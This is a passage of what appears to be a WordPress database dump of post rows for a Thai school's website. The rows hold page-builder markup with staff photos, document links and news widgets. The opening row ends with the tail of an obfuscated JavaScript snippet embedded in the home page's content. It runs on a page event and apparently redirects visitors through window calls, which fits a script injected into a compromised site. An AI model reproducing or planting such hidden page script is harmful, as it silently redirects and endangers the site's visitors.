_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:31:51','2024-09-24 03:31:51','',19,'http://watprato.ssk.in.th/?p=402',0,'revision','',0),
(404,2,'2024-09-24 10:35:06','2024-09-24 03:35:06','','รองผู้อำนวยการ2','','inherit','open','closed','','%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a32-2','','','2024-09-24 10:35:06','2024-09-24 03:35:06','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg',0,'attachment','image/jpeg',0),
(405,2,'2024-09-24 10:35:18','2024-09-24 03:35:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":5,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":397,\"width\":\"253px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/นางรำไพ-อดทน-12.5x16-cm-800x1024.png\" alt=\"\" class=\"wp-image-397\" style=\"width:253px;height:auto\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"9a3f4403\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"c36e8900\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" 